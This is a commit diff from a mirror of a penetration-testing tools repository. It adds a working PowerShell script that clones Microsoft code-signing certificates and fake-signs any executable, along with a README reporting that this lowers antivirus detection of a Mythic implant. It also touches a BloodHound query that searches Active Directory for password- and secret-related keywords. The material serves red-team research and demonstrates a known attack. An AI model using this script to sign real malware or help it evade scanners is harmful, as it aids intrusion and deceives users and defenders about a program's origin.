mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-22 02:21:36 +01:00
Merge branch 'master' of github.com:mgeeky/Penetration-Testing-Tools
This commit is contained in:
commit
ba09824453
@ -1 +1 @@
|
||||
Subproject commit 9aa8a2a623077cae13922ba8a9cabe1d17bc5a5c
|
||||
Subproject commit 0c945011fb341f2d5e66a169c2b4b6760592d5b4
|
@ -1 +1 @@
|
||||
Subproject commit 75f6270d0417d749b56c718d0d8ad0003c74d785
|
||||
Subproject commit c887a6501b08670a9585b50938e93ea20470e88c
|
@ -1 +1 @@
|
||||
Subproject commit 56f3289d8cd34883a95a0cf3e639dac1a82ce6f2
|
||||
Subproject commit 878f19a4a342f734da9cc9ca6af1b26a3160cc04
|
@ -1 +1 @@
|
||||
Subproject commit b18def7a662f9f3ba9b3b1dc9b54658c63d4952e
|
||||
Subproject commit b5ceae633a9b1995e38dee2192d893bb487ef550
|
@ -1 +1 @@
|
||||
Subproject commit 1ce441eb14cb5e639036a4833b0445f986e12601
|
||||
Subproject commit 81d148956541453179216b6f708c69b28891a48e
|
BIN
red-teaming/Self-Signed Threat/MSKernel32Leaf.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32Leaf.cer
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/MSKernel32PCA.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32PCA.cer
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/MSKernel32Root.cer
Normal file
BIN
red-teaming/Self-Signed Threat/MSKernel32Root.cer
Normal file
Binary file not shown.
25
red-teaming/Self-Signed Threat/README.md
Normal file
25
red-teaming/Self-Signed Threat/README.md
Normal file
@ -0,0 +1,25 @@
|
||||
## Code Signing Certificate Cloning Attack
|
||||
|
||||
A Powershell script that signs input Executable file with fake Microsoft code-signing certificate to demonstrate risks of cloned-certificate sign attacks.
|
||||
|
||||
Script was shamelessly borrowed from [Matt Graeber, @mattifestation](https://twitter.com/mattifestation) and his research titled:
|
||||
- [_Code Signing Certificate Cloning Attacks and Defenses_](https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec)
|
||||
|
||||
**All credits go to Matt** - this directory contains a copy of his code (_a little tweaked by me_) for preserverance purposes.
|
||||
|
||||
|
||||
### Effectiveness
|
||||
|
||||
As of [13/07/2022](https://twitter.com/mariuszbit/status/1547320418821980160) this **dumb trick** still gets off the shelf malware evade detection of at least 8 modern security scanners.
|
||||
|
||||
| What | Result |
|
||||
|------------------------------------------------------------------------------|-----------|
|
||||
| Mythic Apollo.exe before fake-signing | [30/70](https://www.virustotal.com/gui/file/1413de7cee2c7c161f814fe93256968450b4e99ae65f0b5e7c2e76128526cc73?nocache=1) |
|
||||
| Mythic Apollo.exe after fake-signing with Microsoft code-signing certificate | [22/70](https://www.virustotal.com/gui/file/34543de8a6b24c98ea526d8f2ae5f1dbe99d64386d8a8f46ddbcdcebaac3df65?nocache=1) |
|
||||
|
||||
### Usage
|
||||
|
||||
```
|
||||
PS C:\> . .\Sign-Artifact.ps1
|
||||
PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile nomalware.exe -Verbose
|
||||
```
|
98
red-teaming/Self-Signed Threat/Sign-Artifact.ps1
Normal file
98
red-teaming/Self-Signed Threat/Sign-Artifact.ps1
Normal file
@ -0,0 +1,98 @@
|
||||
Function Sign-Artifact {
|
||||
<#
|
||||
.SYNOPSIS
|
||||
Signs input executable file with a faked Microsoft code signing certificate.
|
||||
|
||||
.DESCRIPTION
|
||||
This script uses built-into Windows interfaces to import a fake Microsoft code-signing certificate
|
||||
and use it to sign input executable artifact. Result will be signed, although not verifiable executable.
|
||||
|
||||
Based on Matt Graeber's implementation:
|
||||
https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
|
||||
|
||||
.EXAMPLE
|
||||
PS C:\> Sign-Artifact -InputFile malware.exe -OutputFile microsoft.exe
|
||||
#>
|
||||
|
||||
[CmdletBinding()]
|
||||
param(
|
||||
[Parameter(Mandatory=$True)]
|
||||
[string]
|
||||
$InputFile,
|
||||
|
||||
[Parameter(Mandatory=$True)]
|
||||
[string]
|
||||
$OutputFile,
|
||||
|
||||
[switch]
|
||||
$Quiet
|
||||
)
|
||||
|
||||
$Verbose = $PSCmdlet.MyInvocation.BoundParameters["Verbose"].IsPresent
|
||||
|
||||
if (-not(Test-Path $InputFile))
|
||||
{
|
||||
Write-Error "[!] Input file does not exist! FilePath: $InputFile"
|
||||
exit 1
|
||||
}
|
||||
|
||||
if(Test-Path $OutputFile)
|
||||
{
|
||||
Remove-Item -Force $OutputFile
|
||||
}
|
||||
|
||||
#
|
||||
# Based on:
|
||||
#
|
||||
#
|
||||
|
||||
# We'll just store the cloned certificates in current user "Personal" store for now.
|
||||
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
|
||||
|
||||
$MS_Root_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "\MSKernel32Root.cer")
|
||||
$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation
|
||||
|
||||
$MS_PCA_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32PCA.cer")
|
||||
$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation
|
||||
|
||||
$MS_Leaf_Cert = Get-PfxCertificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Leaf.cer")
|
||||
$Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation
|
||||
|
||||
|
||||
# Validate that that $OutputFile is not signed.
|
||||
if($Verbose)
|
||||
{
|
||||
Write-Host "`n================================================================================================`n[.] Before signing: `n"
|
||||
Get-AuthenticodeSignature -FilePath $InputFile
|
||||
}
|
||||
|
||||
Copy-Item -Force $InputFile $OutputFile | Out-Null
|
||||
|
||||
|
||||
# Sign $OutputFile with the cloned Microsoft leaf certificate.
|
||||
Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath $OutputFile | Out-Null
|
||||
|
||||
# The certificate will not properly validate because the root certificate is not trusted.
|
||||
|
||||
# View the StatusMessage property to see the reason why Set-AuthenticodeSignature returned "UnknownError"
|
||||
# "A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider"
|
||||
|
||||
if($Verbose)
|
||||
{
|
||||
Write-Host "`n================================================================================================`n[+] After signing: `n"
|
||||
Get-AuthenticodeSignature -FilePath $OutputFile
|
||||
}
|
||||
|
||||
if(-not $Quiet -or $Verbose)
|
||||
{
|
||||
Get-AuthenticodeSignature -FilePath $OutputFile | Format-List *
|
||||
}
|
||||
|
||||
# Save the root certificate to disk and import it into the current user root store.
|
||||
# Upon doing this, the $OutputFile signature will validate properly.
|
||||
# Export-Certificate -Type CERT -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -Cert $Cloned_MS_Root_Cert
|
||||
# Import-Certificate -FilePath (Join-Path -Path $PSScriptRoot -ChildPath "MSKernel32Root_Cloned.cer") -CertStoreLocation Cert:\CurrentUser\Root\
|
||||
#
|
||||
# # You may need to start a new PowerShell process for the valid signature to take effect.
|
||||
# Get-AuthenticodeSignature -FilePath $FilePath
|
||||
}
|
BIN
red-teaming/Self-Signed Threat/sigcheck.exe
Normal file
BIN
red-teaming/Self-Signed Threat/sigcheck.exe
Normal file
Binary file not shown.
BIN
red-teaming/Self-Signed Threat/sigcheck64.exe
Normal file
BIN
red-teaming/Self-Signed Threat/sigcheck64.exe
Normal file
Binary file not shown.
@ -1 +1 @@
|
||||
Subproject commit d93487d8055668ee9e4b8b12d550a9cf1db7cdc4
|
||||
Subproject commit fe849f7f3df48c38b2d3abfb0578799c75fb98c9
|
@ -400,7 +400,7 @@ MATCH (o:OU)-[:Contains]->(c) RETURN o.name,o.guid, COUNT(c) ORDER BY COUNT(c) D
|
||||
|
||||
- Retrieves nodes having particular juicy keywords in their name or description properties:
|
||||
```
|
||||
UNWIND ["admin", "amministratore", "contrase", "empfidlich", "geheim", "hasło", "important", "azure", "MSOL", "Kennwort", "parol", "parola", "pass", "passe", "secret", "secreto", "segreto", "sekret", "sensibil", "sensibile", "sensible", "sensitive", "wrażliw"] AS word MATCH (n) WHERE (toLower(n.name) CONTAINS toLower(word)) OR (toLower(n.description) CONTAINS toLower(word)) RETURN word, n.name, n.description ORDER BY n.name
|
||||
UNWIND ["admin", "amministratore", "contrase", "empfindlich", "geheim", "hasło", "important", "azure", "MSOL", "Kennwort", "parol", "parola", "pass", "passe", "secret", "secreto", "segreto", "sekret", "sensibil", "sensibile", "sensible", "sensitive", "wrażliw"] AS word MATCH (n) WHERE (toLower(n.name) CONTAINS toLower(word)) OR (toLower(n.description) CONTAINS toLower(word)) RETURN word, n.name, n.description ORDER BY n.name
|
||||
```
|
||||
|
||||
- Retrieves nodes that contain UNC paths to SMB shares in their description fields:
|
||||
@ -480,4 +480,4 @@ DOMAIN USERS@WINDOMAIN.LOCAL - AdminTo -> SECWWKS1000000.WINDOMAIN.LOCAL - Gener
|
||||
|
||||
- Hausec - https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
|
||||
- Jeffmcjunkin - https://gist.github.com/jeffmcjunkin/7b4a67bb7dd0cfbfbd83768f3aa6eb12
|
||||
- seajaysec - https://gist.github.com/seajaysec/c7f0995b5a6a2d30515accde8513f77d
|
||||
- seajaysec - https://gist.github.com/seajaysec/c7f0995b5a6a2d30515accde8513f77d
|
||||
|
@ -1 +1 @@
|
||||
Subproject commit f31499e175e18d04b091bd7f407392378231f4e6
|
||||
Subproject commit 41836eeb02d1be01222fdd5020d284ea9fec7b3a
|
@ -1 +1 @@
|
||||
Subproject commit fc3ac281bc3f79963c8e0e07015f63c164c32b06
|
||||
Subproject commit 79fcd49a329b243c80da832192c30d500c68bf8e
|
@ -1 +1 @@
|
||||
Subproject commit cb7a803493b9ce9fb5a5a3bc1c77773a60194ca4
|
||||
Subproject commit 424c6d09608821b761f90d0eb4aaa794f79b480a
|
@ -1 +1 @@
|
||||
Subproject commit fce3a52d15becf671b52b6f9309ccccdc8aeb2ec
|
||||
Subproject commit f67caea38a7acdb526eae3aac7c451a08edef6a9
|
@ -1 +1 @@
|
||||
Subproject commit 414446b226dc963f651988ab6c1aece8e17d4980
|
||||
Subproject commit ff8dc75967381e6bdfb6820cca564ee5250cce58
|
Loading…
Reference in New Issue
Block a user